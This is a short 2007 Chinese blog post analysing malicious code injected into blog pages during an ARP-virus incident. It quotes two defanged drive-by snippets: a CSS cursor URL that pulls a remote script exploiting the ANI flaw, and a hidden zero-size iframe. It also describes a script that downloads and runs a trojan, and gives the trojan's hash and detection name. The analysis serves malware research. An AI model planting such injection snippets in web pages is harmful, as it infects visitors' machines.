endurer 原创
2007-05-19 第1版
分析了一下
ARP病毒“吃里巴外”?
http://endurer.bokee.com/6277614.htmljavascript:void(0)
http://blog.sina.com.cn/u/49926d91010008q6
中自动添加的网址 hxxp://www.z*px**5**2*0.com/0***.htm
其中包含两处恶意代码。
其1是:
/---
<BODY style='CURSOR: url(hxxp://q***.z*px**5**2*0.com/w***.js
)'>
---/
w***.js 利用 ANI 漏洞下载 0.exe。
文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:51:40
修改时间 : 2007-5-16 10:51:40
访问时间 : 2007-5-16 10:51:57
大小 : 16652 字节 16.268 KB
MD5 : 07c7128add5aed0197d66a15a59960d7
Kaspersky 报为 Trojan-Downloader.Win32.Delf.bjy。
其2是:
/---
<iframe src="hxxp://www.z*px**5**2*0.com/1***.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.z*px**5**2*0.com/1***.htm 的内容是 JavaScript 和 VBScript代码,利用Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载 0.exe,保存为msinfo.exe,创建 msinfo.vbs,并利用Shell.Application 对象 ZhOnG 的 ShellExecute 方法 来运行。
